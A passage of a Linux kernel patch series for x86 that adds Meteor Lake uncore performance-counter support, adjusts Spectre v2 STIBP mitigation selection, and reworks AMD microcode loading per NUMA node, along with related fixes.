+ #define PCI_DEVICE_ID_INTEL_RPL_24_IMC		0xA729
+ #define PCI_DEVICE_ID_INTEL_RPL_25_IMC		0xA72A
++#define PCI_DEVICE_ID_INTEL_MTL_1_IMC		0x7d00
++#define PCI_DEVICE_ID_INTEL_MTL_2_IMC		0x7d01
++#define PCI_DEVICE_ID_INTEL_MTL_3_IMC		0x7d02
++#define PCI_DEVICE_ID_INTEL_MTL_4_IMC		0x7d05
++#define PCI_DEVICE_ID_INTEL_MTL_5_IMC		0x7d10
++#define PCI_DEVICE_ID_INTEL_MTL_6_IMC		0x7d14
++#define PCI_DEVICE_ID_INTEL_MTL_7_IMC		0x7d15
++#define PCI_DEVICE_ID_INTEL_MTL_8_IMC		0x7d16
++#define PCI_DEVICE_ID_INTEL_MTL_9_IMC		0x7d21
++#define PCI_DEVICE_ID_INTEL_MTL_10_IMC		0x7d22
++#define PCI_DEVICE_ID_INTEL_MTL_11_IMC		0x7d23
++#define PCI_DEVICE_ID_INTEL_MTL_12_IMC		0x7d24
++#define PCI_DEVICE_ID_INTEL_MTL_13_IMC		0x7d28
+ 
+ 
+ #define IMC_UNCORE_DEV(a)						\
+@@ -205,6 +218,32 @@
+ #define ADL_UNC_ARB_PERFEVTSEL0			0x2FD0
+ #define ADL_UNC_ARB_MSR_OFFSET			0x8
+ 
++/* MTL Cbo register */
++#define MTL_UNC_CBO_0_PER_CTR0			0x2448
++#define MTL_UNC_CBO_0_PERFEVTSEL0		0x2442
++
++/* MTL HAC_ARB register */
++#define MTL_UNC_HAC_ARB_CTR			0x2018
++#define MTL_UNC_HAC_ARB_CTRL			0x2012
++
++/* MTL ARB register */
++#define MTL_UNC_ARB_CTR				0x2418
++#define MTL_UNC_ARB_CTRL			0x2412
++
++/* MTL cNCU register */
++#define MTL_UNC_CNCU_FIXED_CTR			0x2408
++#define MTL_UNC_CNCU_FIXED_CTRL			0x2402
++#define MTL_UNC_CNCU_BOX_CTL			0x240e
++
++/* MTL sNCU register */
++#define MTL_UNC_SNCU_FIXED_CTR			0x2008
++#define MTL_UNC_SNCU_FIXED_CTRL			0x2002
++#define MTL_UNC_SNCU_BOX_CTL			0x200e
++
++/* MTL HAC_CBO register */
++#define MTL_UNC_HBO_CTR				0x2048
++#define MTL_UNC_HBO_CTRL			0x2042
++
+ DEFINE_UNCORE_FORMAT_ATTR(event, event, "config:0-7");
+ DEFINE_UNCORE_FORMAT_ATTR(umask, umask, "config:8-15");
+ DEFINE_UNCORE_FORMAT_ATTR(chmask, chmask, "config:8-11");
+@@ -598,6 +637,115 @@ void adl_uncore_cpu_init(void)
+ 	uncore_msr_uncores = adl_msr_uncores;
+ }
+ 
++static struct intel_uncore_type mtl_uncore_cbox = {
++	.name		= "cbox",
++	.num_counters   = 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_CBO_0_PER_CTR0,
++	.event_ctl	= MTL_UNC_CBO_0_PERFEVTSEL0,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_arb = {
++	.name		= "hac_arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HAC_ARB_CTR,
++	.event_ctl	= MTL_UNC_HAC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_arb = {
++	.name		= "arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_ARB_CTR,
++	.event_ctl	= MTL_UNC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_cbox = {
++	.name		= "hac_cbox",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HBO_CTR,
++	.event_ctl	= MTL_UNC_HBO_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static void mtl_uncore_msr_init_box(struct intel_uncore_box *box)
++{
++	wrmsrl(uncore_msr_box_ctl(box), SNB_UNC_GLOBAL_CTL_EN);
++}
++
++static struct intel_uncore_ops mtl_uncore_msr_ops = {
++	.init_box	= mtl_uncore_msr_init_box,
++	.disable_event	= snb_uncore_msr_disable_event,
++	.enable_event	= snb_uncore_msr_enable_event,
++	.read_counter	= uncore_msr_read_counter,
++};
++
++static struct intel_uncore_type mtl_uncore_cncu = {
++	.name		= "cncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_CNCU_BOX_CTL,
++	.fixed_ctr_bits = 48,
++	.fixed_ctr	= MTL_UNC_CNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_CNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type mtl_uncore_sncu = {
++	.name		= "sncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_SNCU_BOX_CTL,
++	.fixed_ctr_bits	= 48,
++	.fixed_ctr	= MTL_UNC_SNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_SNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type *mtl_msr_uncores[] = {
++	&mtl_uncore_cbox,
++	&mtl_uncore_hac_arb,
++	&mtl_uncore_arb,
++	&mtl_uncore_hac_cbox,
++	&mtl_uncore_cncu,
++	&mtl_uncore_sncu,
++	NULL
++};
++
++void mtl_uncore_cpu_init(void)
++{
++	mtl_uncore_cbox.num_boxes = icl_get_cbox_num();
++	uncore_msr_uncores = mtl_msr_uncores;
++}
++
+ enum {
+ 	SNB_PCI_UNCORE_IMC,
+ };
+@@ -1264,6 +1412,19 @@ static const struct pci_device_id tgl_uncore_pci_ids[] = {
+ 	IMC_UNCORE_DEV(RPL_23),
+ 	IMC_UNCORE_DEV(RPL_24),
+ 	IMC_UNCORE_DEV(RPL_25),
++	IMC_UNCORE_DEV(MTL_1),
++	IMC_UNCORE_DEV(MTL_2),
++	IMC_UNCORE_DEV(MTL_3),
++	IMC_UNCORE_DEV(MTL_4),
++	IMC_UNCORE_DEV(MTL_5),
++	IMC_UNCORE_DEV(MTL_6),
++	IMC_UNCORE_DEV(MTL_7),
++	IMC_UNCORE_DEV(MTL_8),
++	IMC_UNCORE_DEV(MTL_9),
++	IMC_UNCORE_DEV(MTL_10),
++	IMC_UNCORE_DEV(MTL_11),
++	IMC_UNCORE_DEV(MTL_12),
++	IMC_UNCORE_DEV(MTL_13),
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/arch/x86/events/zhaoxin/core.c b/arch/x86/events/zhaoxin/core.c
+index 949d845c922b4..3e9acdaeed1ec 100644
+--- a/arch/x86/events/zhaoxin/core.c
++++ b/arch/x86/events/zhaoxin/core.c
+@@ -541,7 +541,13 @@ __init int zhaoxin_pmu_init(void)
+ 
+ 	switch (boot_cpu_data.x86) {
+ 	case 0x06:
+-		if (boot_cpu_data.x86_model == 0x0f || boot_cpu_data.x86_model == 0x19) {
++		/*
++		 * Support Zhaoxin CPU from ZXC series, exclude Nano series through FMS.
++		 * Nano FMS: Family=6, Model=F, Stepping=[0-A][C-D]
++		 * ZXC FMS: Family=6, Model=F, Stepping=E-F OR Family=6, Model=0x19, Stepping=0-3
++		 */
++		if ((boot_cpu_data.x86_model == 0x0f && boot_cpu_data.x86_stepping >= 0x0e) ||
++			boot_cpu_data.x86_model == 0x19) {
+ 
+ 			x86_pmu.max_period = x86_pmu.cntval_mask >> 1;
+ 
+diff --git a/arch/x86/include/asm/fpu/sched.h b/arch/x86/include/asm/fpu/sched.h
+index b2486b2cbc6e0..c2d6cd78ed0c2 100644
+--- a/arch/x86/include/asm/fpu/sched.h
++++ b/arch/x86/include/asm/fpu/sched.h
+@@ -39,7 +39,7 @@ extern void fpu_flush_thread(void);
+ static inline void switch_fpu_prepare(struct fpu *old_fpu, int cpu)
+ {
+ 	if (cpu_feature_enabled(X86_FEATURE_FPU) &&
+-	    !(current->flags & PF_KTHREAD)) {
++	    !(current->flags & (PF_KTHREAD | PF_IO_WORKER))) {
+ 		save_fpregs_to_fpstate(old_fpu);
+ 		/*
+ 		 * The save operation preserved register state, so the
+diff --git a/arch/x86/include/asm/fpu/xcr.h b/arch/x86/include/asm/fpu/xcr.h
+index 9656a5bc6feae..9a710c0604457 100644
+--- a/arch/x86/include/asm/fpu/xcr.h
++++ b/arch/x86/include/asm/fpu/xcr.h
+@@ -5,7 +5,7 @@
+ #define XCR_XFEATURE_ENABLED_MASK	0x00000000
+ #define XCR_XFEATURE_IN_USE_MASK	0x00000001
+ 
+-static inline u64 xgetbv(u32 index)
++static __always_inline u64 xgetbv(u32 index)
+ {
+ 	u32 eax, edx;
+ 
+@@ -27,7 +27,7 @@ static inline void xsetbv(u32 index, u64 value)
+  *
+  * Callers should check X86_FEATURE_XGETBV1.
+  */
+-static inline u64 xfeatures_in_use(void)
++static __always_inline u64 xfeatures_in_use(void)
+ {
+ 	return xgetbv(XCR_XFEATURE_IN_USE_MASK);
+ }
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index d5a58bde091c8..320566a0443db 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -125,13 +125,13 @@ static inline unsigned int x86_cpuid_family(void)
+ #ifdef CONFIG_MICROCODE
+ extern void __init load_ucode_bsp(void);
+ extern void load_ucode_ap(void);
+-void reload_early_microcode(void);
++void reload_early_microcode(unsigned int cpu);
+ extern bool initrd_gone;
+ void microcode_bsp_resume(void);
+ #else
+ static inline void __init load_ucode_bsp(void)			{ }
+ static inline void load_ucode_ap(void)				{ }
+-static inline void reload_early_microcode(void)			{ }
++static inline void reload_early_microcode(unsigned int cpu)	{ }
+ static inline void microcode_bsp_resume(void)			{ }
+ #endif
+ 
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index ac31f9140d07d..e6662adf3af4d 100644
+--- a/arch/x86/include/asm/microcode_amd.h
++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -47,12 +47,12 @@ struct microcode_amd {
+ extern void __init load_ucode_amd_bsp(unsigned int family);
+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+-void reload_ucode_amd(void);
++void reload_ucode_amd(unsigned int cpu);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+-static inline void reload_ucode_amd(void) {}
++static inline void reload_ucode_amd(unsigned int cpu) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index d3fe82c5d6b66..978a3e203cdbb 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -49,6 +49,10 @@
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
+ 
++/* A mask for bits which the kernel toggles when controlling mitigations */
++#define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
++							| SPEC_CTRL_RRSBA_DIS_S)
++
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+ 
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 4e35c66edeb7d..a77dee6a2bf2e 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -697,7 +697,8 @@ bool xen_set_default_idle(void);
+ #endif
+ 
+ void __noreturn stop_this_cpu(void *dummy);
+-void microcode_check(void);
++void microcode_check(struct cpuinfo_x86 *prev_info);
++void store_cpu_caps(struct cpuinfo_x86 *info);
+ 
+ enum l1tf_mitigations {
+ 	L1TF_MITIGATION_OFF,
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index 04c17be9b5fda..bc5b4d788c08d 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++void cpu_emergency_disable_virtualization(void);
++
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+ void nmi_panic_self_stop(struct pt_regs *regs);
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback);
+diff --git a/arch/x86/include/asm/special_insns.h b/arch/x86/include/asm/special_insns.h
+index 35f709f619fb4..c2e322189f853 100644
+--- a/arch/x86/include/asm/special_insns.h
++++ b/arch/x86/include/asm/special_insns.h
+@@ -295,7 +295,7 @@ static inline int enqcmds(void __iomem *dst, const void *src)
+ 	return 0;
+ }
+ 
+-static inline void tile_release(void)
++static __always_inline void tile_release(void)
+ {
+ 	/*
+ 	 * Instruction opcode for TILERELEASE; supported in binutils
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 8757078d4442a..3b12e6b994123 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -126,7 +126,21 @@ static inline void cpu_svm_disable(void)
+ 
+ 	wrmsrl(MSR_VM_HSAVE_PA, 0);
+ 	rdmsrl(MSR_EFER, efer);
+-	wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	if (efer & EFER_SVME) {
++		/*
++		 * Force GIF=1 prior to disabling SVM to ensure INIT and NMI
++		 * aren't blocked, e.g. if a fatal error occurred between CLGI
++		 * and STGI.  Note, STGI may #UD if SVM is disabled from NMI
++		 * context between reading EFER and executing STGI.  In that
++		 * case, GIF must already be set, otherwise the NMI would have
++		 * been blocked, so just eat the fault.
++		 */
++		asm_volatile_goto("1: stgi\n\t"
++				  _ASM_EXTABLE(1b, %l[fault])
++				  ::: "memory" : fault);
++fault:
++		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	}
+ }
+ 
+ /** Makes sure SVM is disabled, if it is supported on the CPU
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 907cc98b19380..518bda50068cb 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -188,6 +188,17 @@ static int acpi_register_lapic(int id, u32 acpiid, u8 enabled)
+ 	return cpu;
+ }
+ 
++static bool __init acpi_is_processor_usable(u32 lapic_flags)
++{
++	if (lapic_flags & ACPI_MADT_ENABLED)
++		return true;
++
++	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++		return true;
++
++	return false;
++}
++
+ static int __init
+ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ {
+@@ -212,6 +223,10 @@ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ 	if (apic_id == 0xffffffff)
+ 		return 0;
+ 
++	/* don't register processors that cannot be onlined */
++	if (!acpi_is_processor_usable(processor->lapic_flags))
++		return 0;
++
+ 	/*
+ 	 * We need to register disabled CPU as well to permit
+ 	 * counting disabled CPUs. This allows us to size
+@@ -250,9 +265,7 @@ acpi_parse_lapic(union acpi_subtable_headers * header, const unsigned long end)
+ 		return 0;
+ 
+ 	/* don't register processors that can not be onlined */
+-	if (acpi_support_online_capable &&
+-	    !(processor->lapic_flags & ACPI_MADT_ENABLED) &&
+-	    !(processor->lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_is_processor_usable(processor->lapic_flags))
+ 		return 0;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index bca0bd8f48464..daad10e7665bf 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -144,9 +144,17 @@ void __init check_bugs(void)
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+ 	 * init code as it is not enumerated and depends on the family.
+ 	 */
+-	if (boot_cpu_has(X86_FEATURE_MSR_SPEC_CTRL))
++	if (cpu_feature_enabled(X86_FEATURE_MSR_SPEC_CTRL)) {
+ 		rdmsrl(MSR_IA32_SPEC_CTRL, x86_spec_ctrl_base);
+ 
++		/*
++		 * Previously running kernel (kexec), may have some controls
++		 * turned ON. Clear them and let the mitigations setup below
++		 * rediscover them based on configuration.
++		 */
++		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
++	}
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -1124,14 +1132,18 @@ spectre_v2_parse_user_cmdline(void)
+ 	return SPECTRE_V2_USER_CMD_AUTO;
+ }
+ 
+-static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++static inline bool spectre_v2_in_eibrs_mode(enum spectre_v2_mitigation mode)
+ {
+-	return mode == SPECTRE_V2_IBRS ||
+-	       mode == SPECTRE_V2_EIBRS ||
++	return mode == SPECTRE_V2_EIBRS ||
+ 	       mode == SPECTRE_V2_EIBRS_RETPOLINE ||
+ 	       mode == SPECTRE_V2_EIBRS_LFENCE;
+ }
+ 
++static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++{
++	return spectre_v2_in_eibrs_mode(mode) || mode == SPECTRE_V2_IBRS;
++}
++
+ static void __init
+ spectre_v2_user_select_mitigation(void)
+ {
+@@ -1194,12 +1206,19 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
+-	 * STIBP is not required.
++	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * is not required.
++	 *
++	 * Enhanced IBRS also protects against cross-thread branch target
++	 * injection in user-mode as the IBRS bit remains always set which
++	 * implicitly enables cross-thread protections.  However, in legacy IBRS
++	 * mode, the IBRS bit is set only on kernel entry and cleared on return
++	 * to userspace. This disables the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in that case.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return;
+ 
+ 	/*
+@@ -2327,7 +2346,7 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index f3cc7699e1e1b..6a25e93f2a87c 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2302,30 +2302,45 @@ void cpu_init_secondary(void)
+ #endif
+ 
+ #ifdef CONFIG_MICROCODE_LATE_LOADING
+-/*
++/**
++ * store_cpu_caps() - Store a snapshot of CPU capabilities
++ * @curr_info: Pointer where to store it
++ *
++ * Returns: None
++ */
++void store_cpu_caps(struct cpuinfo_x86 *curr_info)
++{
++	/* Reload CPUID max function as it might've changed. */
++	curr_info->cpuid_level = cpuid_eax(0);
++
++	/* Copy all capability leafs and pick up the synthetic ones. */
++	memcpy(&curr_info->x86_capability, &boot_cpu_data.x86_capability,
++	       sizeof(curr_info->x86_capability));
++
++	/* Get the hardware CPUID leafs */
++	get_cpu_cap(curr_info);
++}
++
++/**
++ * microcode_check() - Check if any CPU capabilities changed after an update.
++ * @prev_info:	CPU capabilities stored before an update.
++ *
+  * The microcode loader calls this upon late microcode load to recheck features,
+  * only when microcode has been updated. Caller holds microcode_mutex and CPU
+  * hotplug lock.
++ *
++ * Return: None
+  */
+-void microcode_check(void)
++void microcode_check(struct cpuinfo_x86 *prev_info)
+ {
+-	struct cpuinfo_x86 info;
++	struct cpuinfo_x86 curr_info;
+ 
+ 	perf_check_microcode();
+ 
+-	/* Reload CPUID max function as it might've changed. */
+-	info.cpuid_level = cpuid_eax(0);
+-
+-	/*
+-	 * Copy all capability leafs to pick up the synthetic ones so that
+-	 * memcmp() below doesn't fail on that. The ones coming from CPUID will
+-	 * get overwritten in get_cpu_cap().
+-	 */
+-	memcpy(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability));
+-
+-	get_cpu_cap(&info);
++	store_cpu_caps(&curr_info);
+ 
+-	if (!memcmp(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability)))
++	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,
++		    sizeof(prev_info->x86_capability)))
+ 		return;
+ 
+ 	pr_warn("x86/CPU: CPU features have changed after loading microcode, but might not take effect.\n");
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 56471f750762a..ac59783e6e9f6 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -55,7 +55,9 @@ struct cont_desc {
+ };
+ 
+ static u32 ucode_new_rev;
+-static u8 amd_ucode_patch[PATCH_MAX_SIZE];
++
++/* One blob per node. */
++static u8 amd_ucode_patch[MAX_NUMNODES][PATCH_MAX_SIZE];
+ 
+ /*
+  * Microcode patch container file is prepended to the initrd in cpio
+@@ -428,7 +430,7 @@ apply_microcode_early_amd(u32 cpuid_1_eax, void *ucode, size_t size, bool save_p
+ 	patch	= (u8 (*)[PATCH_MAX_SIZE])__pa_nodebug(&amd_ucode_patch);
+ #else
+ 	new_rev = &ucode_new_rev;
+-	patch	= &amd_ucode_patch;
++	patch	= &amd_ucode_patch[0];
+ #endif
+ 
+ 	desc.cpuid_1_eax = cpuid_1_eax;
+@@ -553,8 +555,7 @@ void load_ucode_amd_ap(unsigned int cpuid_1_eax)
+ 	apply_microcode_early_amd(cpuid_1_eax, cp.data, cp.size, false);
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size);
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size);
+ 
+ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ {
+@@ -572,19 +573,19 @@ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ 	if (!desc.mc)
+ 		return -EINVAL;
+ 
+-	ret = load_microcode_amd(true, x86_family(cpuid_1_eax), desc.data, desc.size);
++	ret = load_microcode_amd(x86_family(cpuid_1_eax), desc.data, desc.size);
+ 	if (ret > UCODE_UPDATED)
+ 		return -EINVAL;
+ 
+ 	return 0;
+ }
+ 
+-void reload_ucode_amd(void)
++void reload_ucode_amd(unsigned int cpu)
+ {
+-	struct microcode_amd *mc;
+ 	u32 rev, dummy __always_unused;
++	struct microcode_amd *mc;
+ 
+-	mc = (struct microcode_amd *)amd_ucode_patch;
++	mc = (struct microcode_amd *)amd_ucode_patch[cpu_to_node(cpu)];
+ 
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+@@ -850,9 +851,10 @@ static enum ucode_state __load_microcode_amd(u8 family, const u8 *data,
+ 	return UCODE_OK;
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size)
+ {
++	struct cpuinfo_x86 *c;
++	unsigned int nid, cpu;
+ 	struct ucode_patch *p;
+ 	enum ucode_state ret;
+ 
+@@ -865,22 +867,22 @@ load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
+ 		return ret;
+ 	}
+ 
+-	p = find_patch(0);
+-	if (!p) {
+-		return ret;
+-	} else {
+-		if (boot_cpu_data.microcode >= p->patch_id)
+-			return ret;
++	for_each_node(nid) {
++		cpu = cpumask_first(cpumask_of_node(nid));
++		c = &cpu_data(cpu);
+ 
+-		ret = UCODE_NEW;
+-	}
++		p = find_patch(cpu);
++		if (!p)
++			continue;
+ 
+-	/* save BSP's matching patch for early load */
+-	if (!save)
+-		return ret;
++		if (c->microcode >= p->patch_id)
++			continue;
++
++		ret = UCODE_NEW;
+ 
+-	memset(amd_ucode_patch, 0, PATCH_MAX_SIZE);
+-	memcpy(amd_ucode_patch, p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++		memset(&amd_ucode_patch[nid], 0, PATCH_MAX_SIZE);
++		memcpy(&amd_ucode_patch[nid], p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++	}
+ 
+ 	return ret;
+ }
+@@ -905,14 +907,9 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device)
+ {
+ 	char fw_name[36] = "amd-ucode/microcode_amd.bin";
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+-	bool bsp = c->cpu_index == boot_cpu_data.cpu_index;
+ 	enum ucode_state ret = UCODE_NFOUND;
+ 	const struct firmware *fw;
+ 
+-	/* reload ucode container only on the boot cpu */
+-	if (!bsp)
+-		return UCODE_OK;
+-
+ 	if (c->x86 >= 0x15)
+ 		snprintf(fw_name, sizeof(fw_name), "amd-ucode/microcode_amd_fam%.2xh.bin", c->x86);
+ 
+@@ -925,7 +922,7 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device)
+ 	if (!verify_container(fw->data, fw->size, false))
+ 		goto fw_release;
+ 
+-	ret = load_microcode_amd(bsp, c->x86, fw->data, fw->size);
++	ret = load_microcode_amd(c->x86, fw->data, fw->size);
+ 
+  fw_release:
+ 	release_firmware(fw);
+diff --git a/arch/x86/kernel/cpu/microcode/core.c b/arch/x86/kernel/cpu/microcode/core.c
+index 712aafff96e03..7487518dc2eb0 100644
+--- a/arch/x86/kernel/cpu/microcode/core.c
++++ b/arch/x86/kernel/cpu/microcode/core.c
+@@ -298,7 +298,7 @@ struct cpio_data find_microcode_in_initrd(const char *path, bool use_pa)
+ #endif
+ }
+ 
+-void reload_early_microcode(void)
++void reload_early_microcode(unsigned int cpu)
+ {
+ 	int vendor, family;
+ 
+@@ -312,7 +312,7 @@ void reload_early_microcode(void)
+ 		break;
+ 	case X86_VENDOR_AMD:
+ 		if (family >= 0x10)
+-			reload_ucode_amd();
++			reload_ucode_amd(cpu);
+ 		break;
+ 	default:
+ 		break;
+@@ -438,6 +438,7 @@ wait_for_siblings:
+ static int microcode_reload_late(void)
+ {
+ 	int old = boot_cpu_data.microcode, ret;
++	struct cpuinfo_x86 prev_info;
+ 
+ 	pr_err("Attempting late microcode loading - it is dangerous and taints the kernel.\n");
+ 	pr_err("You should switch to early loading, if possible.\n");
+@@ -445,12 +446,21 @@ static int microcode_reload_late(void)
+ 	atomic_set(&late_cpus_in,  0);
+ 	atomic_set(&late_cpus_out, 0);
+ 
+-	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
+-	if (ret == 0)
+-		microcode_check();
++	/*
++	 * Take a snapshot before the microcode update in order to compare and
++	 * check whether any bits changed after an update.
++	 */
++	store_cpu_caps(&prev_info);
+ 
+-	pr_info("Reload completed, microcode revision: 0x%x -> 0x%x\n",
+-		old, boot_cpu_data.microcode);
++	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
++	if (!ret) {
++		pr_info("Reload succeeded, microcode revision: 0x%x -> 0x%x\n",
++			old, boot_cpu_data.microcode);
++		microcode_check(&prev_info);
++	} else {
++		pr_info("Reload failed, current microcode revision: 0x%x\n",
++			boot_cpu_data.microcode);
++	}
+ 
+ 	return ret;
+ }
+@@ -557,7 +567,7 @@ void microcode_bsp_resume(void)
+ 	if (uci->mc)
+ 		microcode_ops->apply_microcode(cpu);
+ 	else
+-		reload_early_microcode();
++		reload_early_microcode(cpu);
+ }
+ 
+ static struct syscore_ops mc_syscore_ops = {
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 305514431f26e..cdd92ab43cda4 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -37,7 +37,6 @@
